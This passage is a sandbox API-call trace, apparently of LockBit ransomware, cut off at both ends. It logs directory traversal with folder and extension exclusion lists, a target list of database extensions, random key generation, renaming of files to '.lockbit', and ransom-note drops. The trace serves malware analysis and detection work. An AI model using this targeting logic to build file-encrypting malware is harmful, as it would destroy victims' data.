-1 [0210.275] lstrcmpiW (lpString1=".dbt", lpString2=".MMW") returned -1 [0210.275] lstrcmpiW (lpString1=".dbv", lpString2=".MMW") returned -1 [0210.275] lstrcmpiW (lpString1=".frm", lpString2=".MMW") returned -1 [0210.275] lstrcmpiW (lpString1=".mdf", lpString2=".MMW") returned -1 [0210.275] lstrcmpiW (lpString1=".mrg", lpString2=".MMW") returned 1 [0210.275] lstrcmpiW (lpString1=".mwb", lpString2=".MMW") returned 1 [0210.275] lstrcmpiW (lpString1=".myd", lpString2=".MMW") returned 1 [0210.275] lstrcmpiW (lpString1=".ndf", lpString2=".MMW") returned 1 [0210.275] lstrcmpiW (lpString1=".qry", lpString2=".MMW") returned 1 [0210.275] lstrcmpiW (lpString1=".sdb", lpString2=".MMW") returned 1 [0210.275] lstrcmpiW (lpString1=".sdf", lpString2=".MMW") returned 1 [0210.275] lstrcmpiW (lpString1=".sql", lpString2=".MMW") returned 1 [0210.275] lstrcmpiW (lpString1=".sqlite", lpString2=".MMW") returned 1 [0210.275] lstrcmpiW (lpString1=".sqlite3", lpString2=".MMW") returned 1 [0210.276] lstrcmpiW (lpString1=".sqlitedb", lpString2=".MMW") returned 1 [0210.276] lstrcmpiW (lpString1=".tmd", lpString2=".MMW") returned 1 [0210.276] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW.lockbit") returned 70 [0210.276] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW" (normalized: "c:\\program files\\microsoft office\\media\\office14\\office10.mmw"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0210.278] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0210.278] malloc (_Size=0x40068) returned 0x3df0008 [0210.278] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=492624) returned 1 [0210.278] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.279] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.279] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0210.279] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.280] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.280] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0210.280] ReadFile (in: hFile=0xec, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0210.300] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.301] malloc (_Size=0xa2) returned 0x1fa2ed8 [0210.301] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0210.327] free (_Block=0x1fa2ed8) [0210.327] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14") returned 1 [0210.327] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\Restore-My-Files.txt") returned 70 [0210.327] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0210.329] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0210.329] malloc (_Size=0x40068) returned 0x3df0008 [0210.329] WriteFile (in: hFile=0xec, lpBuffer=0x1fa30f8, nNumberOfBytesToWrite=0x472, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x1fa30f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0210.330] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x156c5e00, ftCreationTime.dwHighDateTime=0x1c07b1f, ftLastAccessTime.dwLowDateTime=0x596c1850, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x156c5e00, ftLastWriteTime.dwHighDateTime=0x1c07b1f, nFileSizeHigh=0x0, nFileSizeLow=0x78450, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFFICE10.MMW", cAlternateFileName="")) returned 0 [0210.330] FindClose (in: hFindFile=0x55fe38 | out: hFindFile=0x55fe38) returned 1 [0210.330] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeef015d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x596c1850, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x596c1850, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFFICE14", cAlternateFileName="")) returned 0 [0210.330] FindClose (in: hFindFile=0x55fdf8 | out: hFindFile=0x55fdf8) returned 1 [0210.331] FindNextFileW (in: hFindFile=0x55fdb8, lpFindFileData=0x3d6d598 | out: lpFindFileData=0x3d6d598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x786b6230, ftCreationTime.dwHighDateTime=0x1d5bbf6, ftLastAccessTime.dwLowDateTime=0x94b622d0, ftLastAccessTime.dwHighDateTime=0x1d58d67, ftLastWriteTime.dwLowDateTime=0x94b622d0, ftLastWriteTime.dwHighDateTime=0x1d58d67, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x0, dwReserved1=0x0, cFileName="ng microphone options.exe", cAlternateFileName="NGMICR~1.EXE")) returned 1 [0210.331] lstrcmpiW (lpString1=".", lpString2="ng microphone options.exe") returned -1 [0210.331] lstrcmpiW (lpString1="..", lpString2="ng microphone options.exe") returned -1 [0210.331] PathFindExtensionW (pszPath="ng microphone options.exe") returned=".exe" [0210.331] lstrcmpiW (lpString1=".386", lpString2=".exe") returned -1 [0210.331] lstrcmpiW (lpString1=".cmd", lpString2=".exe") returned -1 [0210.331] lstrcmpiW (lpString1=".exe", lpString2=".exe") returned 0 [0210.331] FindNextFileW (in: hFindFile=0x55fdb8, lpFindFileData=0x3d6d598 | out: lpFindFileData=0x3d6d598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe5db9aa0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe5db9aa0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office14", cAlternateFileName="")) returned 1 [0210.331] lstrcmpiW (lpString1=".", lpString2="Office14") returned -1 [0210.331] lstrcmpiW (lpString1="..", lpString2="Office14") returned -1 [0210.331] lstrcmpiW (lpString1="Office14", lpString2="$windows.~bt") returned 1 [0210.331] lstrcmpiW (lpString1="Office14", lpString2="intel") returned 1 [0210.331] lstrcmpiW (lpString1="Office14", lpString2="msocache") returned 1 [0210.331] lstrcmpiW (lpString1="Office14", lpString2="$recycle.bin") returned 1 [0210.331] lstrcmpiW (lpString1="Office14", lpString2="$windows.~ws") returned 1 [0210.331] lstrcmpiW (lpString1="Office14", lpString2="tor browser") returned -1 [0210.331] lstrcmpiW (lpString1="Office14", lpString2="boot") returned 1 [0210.331] lstrcmpiW (lpString1="Office14", lpString2="system volume information") returned -1 [0210.331] lstrcmpiW (lpString1="Office14", lpString2="perflogs") returned -1 [0210.331] lstrcmpiW (lpString1="Office14", lpString2="google") returned 1 [0210.331] lstrcmpiW (lpString1="Office14", lpString2="application data") returned 1 [0210.331] lstrcmpiW (lpString1="Office14", lpString2="windows") returned -1 [0210.331] lstrcmpiW (lpString1="Office14", lpString2="windows.old") returned -1 [0210.331] lstrcmpiW (lpString1="Office14", lpString2="appdata") returned 1 [0210.331] lstrcmpiW (lpString1="Office14", lpString2="Windows nt") returned -1 [0210.331] lstrcmpiW (lpString1="Office14", lpString2="Msbuild") returned 1 [0210.331] lstrcmpiW (lpString1="Office14", lpString2="Microsoft") returned 1 [0210.332] lstrcmpiW (lpString1="Office14", lpString2="All users") returned 1 [0210.332] lstrcmpiW (lpString1="Office14", lpString2="mozilla") returned 1 [0210.332] lstrcmpiW (lpString1="Office14", lpString2="Microsoft.NET") returned 1 [0210.332] lstrcmpiW (lpString1="Office14", lpString2="microsoft shared") returned 1 [0210.332] lstrcmpiW (lpString1="Office14", lpString2="Internet Explorer") returned 1 [0210.332] lstrcmpiW (lpString1="Office14", lpString2="common files") returned 1 [0210.332] lstrcmpiW (lpString1="Office14", lpString2="opera") returned -1 [0210.332] lstrcmpiW (lpString1="Office14", lpString2="Windows Journal") returned -1 [0210.332] wsprintfW (in: param_1=0x3d6d178, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Office14") returned 43 [0210.332] wsprintfW (in: param_1=0x3d6c550, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Office14\\*") returned 45 [0210.332] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Microsoft Office\\Office14\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6c970, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6c970) returned 0x55fdf8 [0210.332] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0210.332] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe5db9aa0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe5db9aa0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0210.336] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0210.336] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0210.336] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xdf0acac0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xdf0acac0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0210.336] lstrcmpiW (lpString1=".", lpString2="1033") returned -1 [0210.336] lstrcmpiW (lpString1="..", lpString2="1033") returned -1 [0210.336] lstrcmpiW (lpString1="1033", lpString2="$windows.~bt") returned 1 [0210.336] lstrcmpiW (lpString1="1033", lpString2="intel") returned -1 [0210.336] lstrcmpiW (lpString1="1033", lpString2="msocache") returned -1 [0210.336] lstrcmpiW (lpString1="1033", lpString2="$recycle.bin") returned 1 [0210.336] lstrcmpiW (lpString1="1033", lpString2="$windows.~ws") returned 1 [0210.336] lstrcmpiW (lpString1="1033", lpString2="tor browser") returned -1 [0210.336] lstrcmpiW (lpString1="1033", lpString2="boot") returned -1 [0210.336] lstrcmpiW (lpString1="1033", lpString2="system volume information") returned -1 [0210.337] lstrcmpiW (lpString1="1033", lpString2="perflogs") returned -1 [0210.337] lstrcmpiW (lpString1="1033", lpString2="google") returned -1 [0210.337] lstrcmpiW (lpString1="1033", lpString2="application data") returned -1 [0210.337] lstrcmpiW (lpString1="1033", lpString2="windows") returned -1 [0210.337] lstrcmpiW (lpString1="1033", lpString2="windows.old") returned -1 [0210.337] lstrcmpiW (lpString1="1033", lpString2="appdata") returned -1 [0210.337] lstrcmpiW (lpString1="1033", lpString2="Windows nt") returned -1 [0210.337] lstrcmpiW (lpString1="1033", lpString2="Msbuild") returned -1 [0210.337] lstrcmpiW (lpString1="1033", lpString2="Microsoft") returned -1 [0210.337] lstrcmpiW (lpString1="1033", lpString2="All users") returned -1 [0210.337] lstrcmpiW (lpString1="1033", lpString2="mozilla") returned -1 [0210.337] lstrcmpiW (lpString1="1033", lpString2="Microsoft.NET") returned -1 [0210.337] lstrcmpiW (lpString1="1033", lpString2="microsoft shared") returned -1 [0210.337] lstrcmpiW (lpString1="1033", lpString2="Internet Explorer") returned -1 [0210.337] lstrcmpiW (lpString1="1033", lpString2="common files") returned -1 [0210.337] lstrcmpiW (lpString1="1033", lpString2="opera") returned -1 [0210.337] lstrcmpiW (lpString1="1033", lpString2="Windows Journal") returned -1 [0210.337] wsprintfW (in: param_1=0x3d6c550, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Office14\\1033") returned 48 [0210.337] wsprintfW (in: param_1=0x3d6b928, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\*") returned 50 [0210.337] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6bd48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6bd48) returned 0x55fe38 [0210.338] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0210.338] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xdf0acac0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xdf0acac0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0210.339] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0210.339] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0210.339] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4e33900, ftCreationTime.dwHighDateTime=0x1cab7ec, ftLastAccessTime.dwLowDateTime=0x14e98550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa4e33900, ftLastWriteTime.dwHighDateTime=0x1cab7ec, nFileSizeHigh=0x0, nFileSizeLow=0x53b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACCDDSUI.DLL", cAlternateFileName="")) returned 1 [0210.339] lstrcmpiW (lpString1=".", lpString2="ACCDDSUI.DLL") returned -1 [0210.339] lstrcmpiW (lpString1="..", lpString2="ACCDDSUI.DLL") returned -1 [0210.339] PathFindExtensionW (pszPath="ACCDDSUI.DLL") returned=".DLL" [0210.339] lstrcmpiW (lpString1=".386", lpString2=".DLL") returned -1 [0210.339] lstrcmpiW (lpString1=".cmd", lpString2=".DLL") returned -1 [0210.339] lstrcmpiW (lpString1=".exe", lpString2=".DLL") returned 1 [0210.339] lstrcmpiW (lpString1=".ani", lpString2=".DLL") returned -1 [0210.339] lstrcmpiW (lpString1=".adv", lpString2=".DLL") returned -1 [0210.339] lstrcmpiW (lpString1=".theme", lpString2=".DLL") returned 1 [0210.339] lstrcmpiW (lpString1=".msi", lpString2=".DLL") returned 1 [0210.339] lstrcmpiW (lpString1=".msp", lpString2=".DLL") returned 1 [0210.339] lstrcmpiW (lpString1=".com", lpString2=".DLL") returned -1 [0210.339] lstrcmpiW (lpString1=".diagpkg", lpString2=".DLL") returned -1 [0210.339] lstrcmpiW (lpString1=".nls", lpString2=".DLL") returned 1 [0210.339] lstrcmpiW (lpString1=".diagcab", lpString2=".DLL") returned -1 [0210.339] lstrcmpiW (lpString1=".lock", lpString2=".DLL") returned 1 [0210.339] lstrcmpiW (lpString1=".ocx", lpString2=".DLL") returned 1 [0210.339] lstrcmpiW (lpString1=".mpa", lpString2=".DLL") returned 1 [0210.339] lstrcmpiW (lpString1=".cpl", lpString2=".DLL") returned -1 [0210.339] lstrcmpiW (lpString1=".mod", lpString2=".DLL") returned 1 [0210.339] lstrcmpiW (lpString1=".hta", lpString2=".DLL") returned 1 [0210.339] lstrcmpiW (lpString1=".icns", lpString2=".DLL") returned 1 [0210.339] lstrcmpiW (lpString1=".prf", lpString2=".DLL") returned 1 [0210.339] lstrcmpiW (lpString1=".rtp", lpString2=".DLL") returned 1 [0210.339] lstrcmpiW (lpString1=".diagcfg", lpString2=".DLL") returned -1 [0210.339] lstrcmpiW (lpString1=".msstyles", lpString2=".DLL") returned 1 [0210.339] lstrcmpiW (lpString1=".bin", lpString2=".DLL") returned -1 [0210.340] lstrcmpiW (lpString1=".hlp", lpString2=".DLL") returned 1 [0210.340] lstrcmpiW (lpString1=".shs", lpString2=".DLL") returned 1 [0210.340] lstrcmpiW (lpString1=".drv", lpString2=".DLL") returned 1 [0210.340] lstrcmpiW (lpString1=".wpx", lpString2=".DLL") returned 1 [0210.340] lstrcmpiW (lpString1=".bat", lpString2=".DLL") returned -1 [0210.340] lstrcmpiW (lpString1=".rom", lpString2=".DLL") returned 1 [0210.340] lstrcmpiW (lpString1=".msc", lpString2=".DLL") returned 1 [0210.340] lstrcmpiW (lpString1=".spl", lpString2=".DLL") returned 1 [0210.340] lstrcmpiW (lpString1=".ps1", lpString2=".DLL") returned 1 [0210.340] lstrcmpiW (lpString1=".msu", lpString2=".DLL") returned 1 [0210.340] lstrcmpiW (lpString1=".ics", lpString2=".DLL") returned 1 [0210.340] lstrcmpiW (lpString1=".key", lpString2=".DLL") returned 1 [0210.340] lstrcmpiW (lpString1=".mp3", lpString2=".DLL") returned 1 [0210.340] lstrcmpiW (lpString1=".reg", lpString2=".DLL") returned 1 [0210.340] lstrcmpiW (lpString1=".dll", lpString2=".DLL") returned 0 [0210.340] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d407000, ftCreationTime.dwHighDateTime=0x1ca8d26, ftLastAccessTime.dwLowDateTime=0x14ebe6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9d407000, ftLastWriteTime.dwHighDateTime=0x1ca8d26, nFileSizeHigh=0x0, nFileSizeLow=0x79000, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACCESS12.ACC", cAlternateFileName="")) returned 1 [0210.340] lstrcmpiW (lpString1=".", lpString2="ACCESS12.ACC") returned -1 [0210.340] lstrcmpiW (lpString1="..", lpString2="ACCESS12.ACC") returned -1 [0210.340] PathFindExtensionW (pszPath="ACCESS12.ACC") returned=".ACC" [0210.340] lstrcmpiW (lpString1=".386", lpString2=".ACC") returned -1 [0210.340] lstrcmpiW (lpString1=".cmd", lpString2=".ACC") returned 1 [0210.340] lstrcmpiW (lpString1=".exe", lpString2=".ACC") returned 1 [0210.340] lstrcmpiW (lpString1=".ani", lpString2=".ACC") returned 1 [0210.340] lstrcmpiW (lpString1=".adv", lpString2=".ACC") returned 1 [0210.340] lstrcmpiW (lpString1=".theme", lpString2=".ACC") returned 1 [0210.340] lstrcmpiW (lpString1=".msi", lpString2=".ACC") returned 1 [0210.340] lstrcmpiW (lpString1=".msp", lpString2=".ACC") returned 1 [0210.340] lstrcmpiW (lpString1=".com", lpString2=".ACC") returned 1 [0210.340] lstrcmpiW (lpString1=".diagpkg", lpString2=".ACC") returned 1 [0210.340] lstrcmpiW (lpString1=".nls", lpString2=".ACC") returned 1 [0210.340] lstrcmpiW (lpString1=".diagcab", lpString2=".ACC") returned 1 [0210.340] lstrcmpiW (lpString1=".lock", lpString2=".ACC") returned 1 [0210.340] lstrcmpiW (lpString1=".ocx", lpString2=".ACC") returned 1 [0210.341] lstrcmpiW (lpString1=".mpa", lpString2=".ACC") returned 1 [0210.341] lstrcmpiW (lpString1=".cpl", lpString2=".ACC") returned 1 [0210.341] lstrcmpiW (lpString1=".mod", lpString2=".ACC") returned 1 [0210.341] lstrcmpiW (lpString1=".hta", lpString2=".ACC") returned 1 [0210.341] lstrcmpiW (lpString1=".icns", lpString2=".ACC") returned 1 [0210.341] lstrcmpiW (lpString1=".prf", lpString2=".ACC") returned 1 [0210.341] lstrcmpiW (lpString1=".rtp", lpString2=".ACC") returned 1 [0210.341] lstrcmpiW (lpString1=".diagcfg", lpString2=".ACC") returned 1 [0210.341] lstrcmpiW (lpString1=".msstyles", lpString2=".ACC") returned 1 [0210.341] lstrcmpiW (lpString1=".bin", lpString2=".ACC") returned 1 [0210.341] lstrcmpiW (lpString1=".hlp", lpString2=".ACC") returned 1 [0210.341] lstrcmpiW (lpString1=".shs", lpString2=".ACC") returned 1 [0210.341] lstrcmpiW (lpString1=".drv", lpString2=".ACC") returned 1 [0210.341] lstrcmpiW (lpString1=".wpx", lpString2=".ACC") returned 1 [0210.341] lstrcmpiW (lpString1=".bat", lpString2=".ACC") returned 1 [0210.341] lstrcmpiW (lpString1=".rom", lpString2=".ACC") returned 1 [0210.341] lstrcmpiW (lpString1=".msc", lpString2=".ACC") returned 1 [0210.341] lstrcmpiW (lpString1=".spl", lpString2=".ACC") returned 1 [0210.341] lstrcmpiW (lpString1=".ps1", lpString2=".ACC") returned 1 [0210.341] lstrcmpiW (lpString1=".msu", lpString2=".ACC") returned 1 [0210.341] lstrcmpiW (lpString1=".ics", lpString2=".ACC") returned 1 [0210.341] lstrcmpiW (lpString1=".key", lpString2=".ACC") returned 1 [0210.341] lstrcmpiW (lpString1=".mp3", lpString2=".ACC") returned 1 [0210.341] lstrcmpiW (lpString1=".reg", lpString2=".ACC") returned 1 [0210.341] lstrcmpiW (lpString1=".dll", lpString2=".ACC") returned 1 [0210.341] lstrcmpiW (lpString1=".ini", lpString2=".ACC") returned 1 [0210.341] lstrcmpiW (lpString1=".idx", lpString2=".ACC") returned 1 [0210.341] lstrcmpiW (lpString1=".sys", lpString2=".ACC") returned 1 [0210.341] lstrcmpiW (lpString1=".hlp", lpString2=".ACC") returned 1 [0210.341] lstrcmpiW (lpString1=".ico", lpString2=".ACC") returned 1 [0210.341] lstrcmpiW (lpString1=".lnk", lpString2=".ACC") returned 1 [0210.341] lstrcmpiW (lpString1=".rdp", lpString2=".ACC") returned 1 [0210.341] lstrcmpiW (lpString1=".lockbit", lpString2=".ACC") returned 1 [0210.342] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="ACCESS12.ACC") returned 1 [0210.342] lstrcmpiW (lpString1="ntldr", lpString2="ACCESS12.ACC") returned 1 [0210.342] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="ACCESS12.ACC") returned 1 [0210.342] lstrcmpiW (lpString1="bootsect.bak", lpString2="ACCESS12.ACC") returned 1 [0210.342] lstrcmpiW (lpString1="autorun.inf", lpString2="ACCESS12.ACC") returned 1 [0210.342] lstrcmpiW (lpString1="thumbs.db", lpString2="ACCESS12.ACC") returned 1 [0210.342] lstrcmpiW (lpString1="iconcache.db", lpString2="ACCESS12.ACC") returned 1 [0210.342] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\") returned="" [0210.342] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC") returned=".ACC" [0210.342] lstrcmpiW (lpString1=".rar", lpString2=".ACC") returned 1 [0210.342] lstrcmpiW (lpString1=".zip", lpString2=".ACC") returned 1 [0210.342] lstrcmpiW (lpString1=".7z", lpString2=".ACC") returned -1 [0210.342] lstrcmpiW (lpString1=".ckp", lpString2=".ACC") returned 1 [0210.342] lstrcmpiW (lpString1=".dacpac", lpString2=".ACC") returned 1 [0210.342] lstrcmpiW (lpString1=".db", lpString2=".ACC") returned 1 [0210.342] lstrcmpiW (lpString1=".db-shm", lpString2=".ACC") returned 1 [0210.342] lstrcmpiW (lpString1=".db-wal", lpString2=".ACC") returned 1 [0210.342] lstrcmpiW (lpString1=".db3", lpString2=".ACC") returned 1 [0210.342] lstrcmpiW (lpString1=".dbf", lpString2=".ACC") returned 1 [0210.342] lstrcmpiW (lpString1=".dbc", lpString2=".ACC") returned 1 [0210.342] lstrcmpiW (lpString1=".dbs", lpString2=".ACC") returned 1 [0210.342] lstrcmpiW (lpString1=".dbt", lpString2=".ACC") returned 1 [0210.342] lstrcmpiW (lpString1=".dbv", lpString2=".ACC") returned 1 [0210.342] lstrcmpiW (lpString1=".frm", lpString2=".ACC") returned 1 [0210.342] lstrcmpiW (lpString1=".mdf", lpString2=".ACC") returned 1 [0210.342] lstrcmpiW (lpString1=".mrg", lpString2=".ACC") returned 1 [0210.342] lstrcmpiW (lpString1=".mwb", lpString2=".ACC") returned 1 [0210.342] lstrcmpiW (lpString1=".myd", lpString2=".ACC") returned 1 [0210.342] lstrcmpiW (lpString1=".ndf", lpString2=".ACC") returned 1 [0210.342] lstrcmpiW (lpString1=".qry", lpString2=".ACC") returned 1 [0210.342] lstrcmpiW (lpString1=".sdb", lpString2=".ACC") returned 1 [0210.342] lstrcmpiW (lpString1=".sdf", lpString2=".ACC") returned 1 [0210.342] lstrcmpiW (lpString1=".sql", lpString2=".ACC") returned 1 [0210.343] lstrcmpiW (lpString1=".sqlite", lpString2=".ACC") returned 1 [0210.343] lstrcmpiW (lpString1=".sqlite3", lpString2=".ACC") returned 1 [0210.343] lstrcmpiW (lpString1=".sqlitedb", lpString2=".ACC") returned 1 [0210.343] lstrcmpiW (lpString1=".tmd", lpString2=".ACC") returned 1 [0210.343] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC.lockbit") returned 69 [0210.343] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\access12.acc"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0210.346] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0210.346] malloc (_Size=0x40068) returned 0x3df0008 [0210.346] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=495616) returned 1 [0210.346] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.346] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.346] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0210.346] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.347] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.347] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0210.347] ReadFile (in: hFile=0xec, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, 